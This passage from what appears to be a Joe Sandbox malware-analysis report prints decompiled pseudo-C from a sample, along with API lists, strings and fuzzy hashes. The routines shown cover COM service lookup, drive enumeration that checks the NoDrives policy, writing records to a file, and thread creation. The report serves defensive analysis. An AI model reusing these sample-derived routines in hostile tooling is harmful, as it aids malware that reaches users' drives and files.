                                                                                                                                                                                                                                                                  					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                                                                                                                                                                                                  					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                                                                                                                                                                                                  						L18:
                                                                                                                                                                                                                                                                  						continue;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						L4:
                                                                                                                                                                                                                                                                  						 *(_t85 - 0x14) = 0;
                                                                                                                                                                                                                                                                  						_push(_t85 - 0x14);
                                                                                                                                                                                                                                                                  						_push( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                                                                                                                                                                                                  							L6:
                                                                                                                                                                                                                                                                  							if(lstrcmpiW( *(_t85 - 0x14), L"service") == 0) {
                                                                                                                                                                                                                                                                  								L7:
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_t85 - 0x18)) = E0040BF20( *(_t85 - 0x10), L"serviceType");
                                                                                                                                                                                                                                                                  								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                                                                                                                                                                                                  									L8:
                                                                                                                                                                                                                                                                  									 *(_t85 - 0x1c) = 0;
                                                                                                                                                                                                                                                                  									_push(_t85 - 0x1c);
                                                                                                                                                                                                                                                                  									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                                                                                                                                                                                                  										L10:
                                                                                                                                                                                                                                                                  										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                                                                                                                                                                                                  											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										L12:
                                                                                                                                                                                                                                                                  										__imp__#6( *(_t85 - 0x1c));
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									L13:
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							L14:
                                                                                                                                                                                                                                                                  							__imp__#6( *(_t85 - 0x14));
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						L15:
                                                                                                                                                                                                                                                                  						if( *(_t85 - 8) == 0) {
                                                                                                                                                                                                                                                                  							L17:
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                  							goto L18;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					break;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L19:
                                                                                                                                                                                                                                                                  				return  *(_t85 - 8);
                                                                                                                                                                                                                                                                  			}




                                                                                                                                                                                                                                                                  0x0040c461
                                                                                                                                                                                                                                                                  0x0040c461
                                                                                                                                                                                                                                                                  0x0040c461
                                                                                                                                                                                                                                                                  0x0040c467
                                                                                                                                                                                                                                                                  0x0040c470
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c476
                                                                                                                                                                                                                                                                  0x0040c476
                                                                                                                                                                                                                                                                  0x0040c480
                                                                                                                                                                                                                                                                  0x0040c484
                                                                                                                                                                                                                                                                  0x0040c48d
                                                                                                                                                                                                                                                                  0x0040c495
                                                                                                                                                                                                                                                                  0x0040c573
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c4a5
                                                                                                                                                                                                                                                                  0x0040c4a5
                                                                                                                                                                                                                                                                  0x0040c4a5
                                                                                                                                                                                                                                                                  0x0040c4af
                                                                                                                                                                                                                                                                  0x0040c4b8
                                                                                                                                                                                                                                                                  0x0040c4c3
                                                                                                                                                                                                                                                                  0x0040c4d3
                                                                                                                                                                                                                                                                  0x0040c4e4
                                                                                                                                                                                                                                                                  0x0040c4e6
                                                                                                                                                                                                                                                                  0x0040c4f7
                                                                                                                                                                                                                                                                  0x0040c4fe
                                                                                                                                                                                                                                                                  0x0040c500
                                                                                                                                                                                                                                                                  0x0040c500
                                                                                                                                                                                                                                                                  0x0040c50a
                                                                                                                                                                                                                                                                  0x0040c513
                                                                                                                                                                                                                                                                  0x0040c51b
                                                                                                                                                                                                                                                                  0x0040c523
                                                                                                                                                                                                                                                                  0x0040c533
                                                                                                                                                                                                                                                                  0x0040c538
                                                                                                                                                                                                                                                                  0x0040c538
                                                                                                                                                                                                                                                                  0x0040c53b
                                                                                                                                                                                                                                                                  0x0040c53f
                                                                                                                                                                                                                                                                  0x0040c53f
                                                                                                                                                                                                                                                                  0x0040c545
                                                                                                                                                                                                                                                                  0x0040c551
                                                                                                                                                                                                                                                                  0x0040c551
                                                                                                                                                                                                                                                                  0x0040c4fe
                                                                                                                                                                                                                                                                  0x0040c553
                                                                                                                                                                                                                                                                  0x0040c557
                                                                                                                                                                                                                                                                  0x0040c557
                                                                                                                                                                                                                                                                  0x0040c55d
                                                                                                                                                                                                                                                                  0x0040c561
                                                                                                                                                                                                                                                                  0x0040c565
                                                                                                                                                                                                                                                                  0x0040c571
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c571
                                                                                                                                                                                                                                                                  0x0040c561
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c495
                                                                                                                                                                                                                                                                  0x0040c578
                                                                                                                                                                                                                                                                  0x0040c57e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,service), ref: 0040C4DC
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C52B
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C53F
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C557
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                  • String ID: service$serviceType
                                                                                                                                                                                                                                                                  • API String ID: 1602765415-3667235276
                                                                                                                                                                                                                                                                  • Opcode ID: 35a86a95f943aca3dfe219b5fe5441f437489e929dbbc6b6899da0c23cce14ea
                                                                                                                                                                                                                                                                  • Instruction ID: cc6604a93b73a9dd26e6b7eb0b4db72dd5c120a31dbd941355632c204e5cc99b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35a86a95f943aca3dfe219b5fe5441f437489e929dbbc6b6899da0c23cce14ea
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC31FD75A0011AEBCB14DF98DC84AAFB7B5AF48304F108669E514B73A0D738A985CB94
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E004049E0() {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                                                                                                                  				long _v20;
                                                                                                                                                                                                                                                                  				signed int _v24;
                                                                                                                                                                                                                                                                  				void* _v28;
                                                                                                                                                                                                                                                                  				char _v32;
                                                                                                                                                                                                                                                                  				int _v36;
                                                                                                                                                                                                                                                                  				void* _t44;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v20 = GetLogicalDrives();
                                                                                                                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                                                                                                                  				_v12 = 0x80000002;
                                                                                                                                                                                                                                                                  				_v8 = 0x80000001;
                                                                                                                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                                                                                                                  				while(_v24 < 2) {
                                                                                                                                                                                                                                                                  					if(RegOpenKeyExW( *(_t44 + _v24 * 4 - 8), L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", 0, 0x20019,  &_v28) == 0) {
                                                                                                                                                                                                                                                                  						_v32 = 0;
                                                                                                                                                                                                                                                                  						_v36 = 4;
                                                                                                                                                                                                                                                                  						if(RegQueryValueExW(_v28, L"NoDrives", 0, 0,  &_v32,  &_v36) == 0 && _v32 != 0) {
                                                                                                                                                                                                                                                                  							_v16 = _v16 | _v32;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						RegCloseKey(_v28);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v24 = _v24 + 1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return  !_v16 & _v20;
                                                                                                                                                                                                                                                                  			}












                                                                                                                                                                                                                                                                  0x004049ec
                                                                                                                                                                                                                                                                  0x004049ef
                                                                                                                                                                                                                                                                  0x004049f6
                                                                                                                                                                                                                                                                  0x004049fd
                                                                                                                                                                                                                                                                  0x00404a04
                                                                                                                                                                                                                                                                  0x00404a16
                                                                                                                                                                                                                                                                  0x00404a3c
                                                                                                                                                                                                                                                                  0x00404a3e
                                                                                                                                                                                                                                                                  0x00404a45
                                                                                                                                                                                                                                                                  0x00404a69
                                                                                                                                                                                                                                                                  0x00404a77
                                                                                                                                                                                                                                                                  0x00404a77
                                                                                                                                                                                                                                                                  0x00404a7e
                                                                                                                                                                                                                                                                  0x00404a7e
                                                                                                                                                                                                                                                                  0x00404a13
                                                                                                                                                                                                                                                                  0x00404a13
                                                                                                                                                                                                                                                                  0x00404a91

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLogicalDrives.KERNEL32 ref: 004049E6
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00404A34
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404A61
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00404A7E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00404A27
                                                                                                                                                                                                                                                                  • NoDrives, xrefs: 00404A58
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                                                                                                                                                  • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                                                                                                                                                  • API String ID: 2666887985-3471754645
                                                                                                                                                                                                                                                                  • Opcode ID: 9409f5f2476fbb1cfb48f401b5588662eeb023834a81a6b5a0276b8bcd01b5a6
                                                                                                                                                                                                                                                                  • Instruction ID: 7c4b250e2e372944b684dead308e34dd4c265bb9b8d3a23af7e8a0b56d6b1af5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9409f5f2476fbb1cfb48f401b5588662eeb023834a81a6b5a0276b8bcd01b5a6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B11CCB1E4020AABDB10CFD4D945BEEB774FB48704F108169E611B7280D7B86A45CF99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                                                                                                                                  			E004046A0(intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                  				signed int _v5;
                                                                                                                                                                                                                                                                  				void* _v12;
                                                                                                                                                                                                                                                                  				signed int _v13;
                                                                                                                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                                                                                                                  				void* _v24;
                                                                                                                                                                                                                                                                  				void* _v28;
                                                                                                                                                                                                                                                                  				signed int _v32;
                                                                                                                                                                                                                                                                  				long _v36;
                                                                                                                                                                                                                                                                  				signed char _t76;
                                                                                                                                                                                                                                                                  				void* _t79;
                                                                                                                                                                                                                                                                  				intOrPtr _t87;
                                                                                                                                                                                                                                                                  				intOrPtr _t88;
                                                                                                                                                                                                                                                                  				signed char _t91;
                                                                                                                                                                                                                                                                  				signed int _t141;
                                                                                                                                                                                                                                                                  				void* _t158;
                                                                                                                                                                                                                                                                  				void* _t159;
                                                                                                                                                                                                                                                                  				void* _t160;
                                                                                                                                                                                                                                                                  				void* _t169;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v5 = 0;
                                                                                                                                                                                                                                                                  				EnterCriticalSection(0x412f50);
                                                                                                                                                                                                                                                                  				_t111 = _a12;
                                                                                                                                                                                                                                                                  				_t76 = E0040AF90(_a12, _a16);
                                                                                                                                                                                                                                                                  				_t159 = _t158 + 8;
                                                                                                                                                                                                                                                                  				if((_t76 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                  					_t79 = E0040AF30(_t111, _a12);
                                                                                                                                                                                                                                                                  					_t160 = _t159 + 4;
                                                                                                                                                                                                                                                                  					_v12 = _t79;
                                                                                                                                                                                                                                                                  					if(_v12 != 0) {
                                                                                                                                                                                                                                                                  						_v5 = 1;
                                                                                                                                                                                                                                                                  						_v13 = 0;
                                                                                                                                                                                                                                                                  						_v20 = 0;
                                                                                                                                                                                                                                                                  						while(1) {
                                                                                                                                                                                                                                                                  							_t169 = _v20 -  *0x412f6c; // 0x0
                                                                                                                                                                                                                                                                  							if(_t169 >= 0) {
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_v24 = _v20 * 0x110 +  *0x412f68;
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)(_v24 + 4)) ==  *((intOrPtr*)(_v12 + 4))) {
                                                                                                                                                                                                                                                                  								memcpy(_v24, _v12, 0x40 << 2);
                                                                                                                                                                                                                                                                  								E00408990( *((intOrPtr*)(_v24 + 0x108)));
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_v24 + 0x108)) = E00408A00(_a12, _a16);
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_v24 + 0x10c)) = _a16;
                                                                                                                                                                                                                                                                  								E00408990( *((intOrPtr*)(_v24 + 0x100)));
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_v24 + 0x104)) = _a16 - 0x100;
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_v24 + 0x100)) = E0040A8A0( *((intOrPtr*)(_v24 + 0x104)), _v24 + 0x14, 0x14, _a12 + 0x100,  *((intOrPtr*)(_v24 + 0x104)));
                                                                                                                                                                                                                                                                  								_push( *((intOrPtr*)(_v24 + 8)));
                                                                                                                                                                                                                                                                  								E004059C0( *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 4)),  *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 0x104)));
                                                                                                                                                                                                                                                                  								_t160 = _t160 + 0x3c;
                                                                                                                                                                                                                                                                  								_v13 = 1;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                  								continue;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						__eflags = _v13 & 0x000000ff;
                                                                                                                                                                                                                                                                  						if((_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  							_t91 = E00404210(_a16, _v12, _a12, _a16, 1);
                                                                                                                                                                                                                                                                  							_t160 = _t160 + 0x10;
                                                                                                                                                                                                                                                                  							__eflags = _t91 & 0x000000ff;
                                                                                                                                                                                                                                                                  							if((_t91 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  								 *0x412f6c = 0;
                                                                                                                                                                                                                                                                  								_v5 = 0;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						E00408990(_v12);
                                                                                                                                                                                                                                                                  						__eflags = _v5 & 0x000000ff;
                                                                                                                                                                                                                                                                  						if((_v5 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                  							_v28 = CreateFileW(0x413180, 0x40000000, 0, 0, 2, 2, 0);
                                                                                                                                                                                                                                                                  							__eflags = _v28 - 0xffffffff;
                                                                                                                                                                                                                                                                  							if(_v28 != 0xffffffff) {
                                                                                                                                                                                                                                                                  								_v32 = 0;
                                                                                                                                                                                                                                                                  								while(1) {
                                                                                                                                                                                                                                                                  									__eflags = _v32 -  *0x412f6c; // 0x0
                                                                                                                                                                                                                                                                  									if(__eflags >= 0) {
                                                                                                                                                                                                                                                                  										break;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_t87 =  *0x412f68; // 0x0
                                                                                                                                                                                                                                                                  									_t88 =  *0x412f68; // 0x0
                                                                                                                                                                                                                                                                  									WriteFile(_v28,  *(_t88 + 0x108 + _v32 * 0x110),  *(_t87 + 0x10c + _v32 * 0x110),  &_v36, 0);
                                                                                                                                                                                                                                                                  									_t141 = _v32 + 1;
                                                                                                                                                                                                                                                                  									__eflags = _t141;
                                                                                                                                                                                                                                                                  									_v32 = _t141;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								FlushFileBuffers(_v28);
                                                                                                                                                                                                                                                                  								CloseHandle(_v28);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				LeaveCriticalSection(0x412f50);
                                                                                                                                                                                                                                                                  				return _v5;
                                                                                                                                                                                                                                                                  			}





















                                                                                                                                                                                                                                                                  0x004046a8
                                                                                                                                                                                                                                                                  0x004046b1
                                                                                                                                                                                                                                                                  0x004046bb
                                                                                                                                                                                                                                                                  0x004046bf
                                                                                                                                                                                                                                                                  0x004046c4
                                                                                                                                                                                                                                                                  0x004046cc
                                                                                                                                                                                                                                                                  0x004046d6
                                                                                                                                                                                                                                                                  0x004046db
                                                                                                                                                                                                                                                                  0x004046de
                                                                                                                                                                                                                                                                  0x004046e5
                                                                                                                                                                                                                                                                  0x004046eb
                                                                                                                                                                                                                                                                  0x004046ef
                                                                                                                                                                                                                                                                  0x004046f3
                                                                                                                                                                                                                                                                  0x00404705
                                                                                                                                                                                                                                                                  0x00404708
                                                                                                                                                                                                                                                                  0x0040470e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404723
                                                                                                                                                                                                                                                                  0x00404732
                                                                                                                                                                                                                                                                  0x00404741
                                                                                                                                                                                                                                                                  0x0040474d
                                                                                                                                                                                                                                                                  0x00404768
                                                                                                                                                                                                                                                                  0x00404774
                                                                                                                                                                                                                                                                  0x00404784
                                                                                                                                                                                                                                                                  0x00404798
                                                                                                                                                                                                                                                                  0x004047c6
                                                                                                                                                                                                                                                                  0x004047d2
                                                                                                                                                                                                                                                                  0x004047ee
                                                                                                                                                                                                                                                                  0x004047f3
                                                                                                                                                                                                                                                                  0x004047f6
                                                                                                                                                                                                                                                                  0x00404734
                                                                                                                                                                                                                                                                  0x00404702
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404702
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404732
                                                                                                                                                                                                                                                                  0x00404805
                                                                                                                                                                                                                                                                  0x00404807
                                                                                                                                                                                                                                                                  0x00404817
                                                                                                                                                                                                                                                                  0x0040481c
                                                                                                                                                                                                                                                                  0x00404822
                                                                                                                                                                                                                                                                  0x00404824
                                                                                                                                                                                                                                                                  0x00404826
                                                                                                                                                                                                                                                                  0x00404830
                                                                                                                                                                                                                                                                  0x00404830
                                                                                                                                                                                                                                                                  0x00404824
                                                                                                                                                                                                                                                                  0x00404838
                                                                                                                                                                                                                                                                  0x00404844
                                                                                                                                                                                                                                                                  0x00404846
                                                                                                                                                                                                                                                                  0x00404866
                                                                                                                                                                                                                                                                  0x00404869
                                                                                                                                                                                                                                                                  0x0040486d
                                                                                                                                                                                                                                                                  0x0040486f
                                                                                                                                                                                                                                                                  0x00404881
                                                                                                                                                                                                                                                                  0x00404884
                                                                                                                                                                                                                                                                  0x0040488a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040489b
                                                                                                                                                                                                                                                                  0x004048b1
                                                                                                                                                                                                                                                                  0x004048c2
                                                                                                                                                                                                                                                                  0x0040487b
                                                                                                                                                                                                                                                                  0x0040487b
                                                                                                                                                                                                                                                                  0x0040487e
                                                                                                                                                                                                                                                                  0x0040487e
                                                                                                                                                                                                                                                                  0x004048ce
                                                                                                                                                                                                                                                                  0x004048d8
                                                                                                                                                                                                                                                                  0x004048d8
                                                                                                                                                                                                                                                                  0x0040486d
                                                                                                                                                                                                                                                                  0x00404846
                                                                                                                                                                                                                                                                  0x004046e5
                                                                                                                                                                                                                                                                  0x004048e3
                                                                                                                                                                                                                                                                  0x004048f1

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00412F50,?,?,00000000,0040A267,006A0266,?,0040A283,00000000,0040B53C,?), ref: 004046B1
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00413180,40000000,00000000,00000000,00000002,00000002,00000000,?,?,?,?,00000000,0040A267,006A0266), ref: 00404860
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000,?,?,?,?,00000000), ref: 004048C2
                                                                                                                                                                                                                                                                  • FlushFileBuffers.KERNEL32(000000FF,?,?,?,?,00000000), ref: 004048CE
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,?,?,?,00000000), ref: 004048D8
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00412F50,?,?,00000000,0040A267,006A0266,?,0040A283,00000000,0040B53C,?), ref: 004048E3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWrite
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2945370292-0
                                                                                                                                                                                                                                                                  • Opcode ID: 83e2c9dd5534507d00b708f5602cd6ee7c992e6f706f8ffe9372c3b8fc6bc520
                                                                                                                                                                                                                                                                  • Instruction ID: 3207af2ea602bfb65b54bf45aa4f15af2ab48cc6669a523460d3cb6d0fbea14a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83e2c9dd5534507d00b708f5602cd6ee7c992e6f706f8ffe9372c3b8fc6bc520
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4771C0F5E002099BCB04DF94D985BEFB7B1BB88304F148579E644BB381C778A952CBA5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040B8C0(signed int* _a4, long _a8, _Unknown_base(*)()* _a12, void* _a16, DWORD* _a20, HANDLE* _a24) {
                                                                                                                                                                                                                                                                  				long _v8;
                                                                                                                                                                                                                                                                  				signed int* _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				void* _t49;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				if(_a4 == 0) {
                                                                                                                                                                                                                                                                  					L8:
                                                                                                                                                                                                                                                                  					return _v8;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v12 = _a4;
                                                                                                                                                                                                                                                                  				EnterCriticalSection( &(_v12[1]));
                                                                                                                                                                                                                                                                  				E0040B840( &(_v12[1]), _v12);
                                                                                                                                                                                                                                                                  				if(_a12 != 0) {
                                                                                                                                                                                                                                                                  					_v12[7] = E00408880(_v12[7], 4 +  *_v12 * 4, _v12[7], 4 +  *_v12 * 4);
                                                                                                                                                                                                                                                                  					if(_v12[7] != 0) {
                                                                                                                                                                                                                                                                  						_v16 = CreateThread(0, _a8, _a12, _a16, 0, _a20);
                                                                                                                                                                                                                                                                  						if(_v16 != 0) {
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)(_v12[7] +  *_v12 * 4)) = _v16;
                                                                                                                                                                                                                                                                  							 *_v12 =  *_v12 + 1;
                                                                                                                                                                                                                                                                  							if(_a24 != 0) {
                                                                                                                                                                                                                                                                  								_t49 = GetCurrentProcess();
                                                                                                                                                                                                                                                                  								DuplicateHandle(GetCurrentProcess(), _v16, _t49, _a24, 0, 0, 2);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_v8 = 1;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				LeaveCriticalSection( &(_v12[1]));
                                                                                                                                                                                                                                                                  				goto L8;
                                                                                                                                                                                                                                                                  			}







                                                                                                                                                                                                                                                                  0x0040b8c6
                                                                                                                                                                                                                                                                  0x0040b8d1
                                                                                                                                                                                                                                                                  0x0040b9a8
                                                                                                                                                                                                                                                                  0x0040b9ae
                                                                                                                                                                                                                                                                  0x0040b9ae
                                                                                                                                                                                                                                                                  0x0040b8da
                                                                                                                                                                                                                                                                  0x0040b8e4
                                                                                                                                                                                                                                                                  0x0040b8ee
                                                                                                                                                                                                                                                                  0x0040b8fa
                                                                                                                                                                                                                                                                  0x0040b91f
                                                                                                                                                                                                                                                                  0x0040b929
                                                                                                                                                                                                                                                                  0x0040b945
                                                                                                                                                                                                                                                                  0x0040b94c
                                                                                                                                                                                                                                                                  0x0040b95c
                                                                                                                                                                                                                                                                  0x0040b96a
                                                                                                                                                                                                                                                                  0x0040b970
                                                                                                                                                                                                                                                                  0x0040b97c
                                                                                                                                                                                                                                                                  0x0040b98e
                                                                                                                                                                                                                                                                  0x0040b98e
                                                                                                                                                                                                                                                                  0x0040b994
                                                                                                                                                                                                                                                                  0x0040b994
                                                                                                                                                                                                                                                                  0x0040b94c
                                                                                                                                                                                                                                                                  0x0040b929
                                                                                                                                                                                                                                                                  0x0040b9a2
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
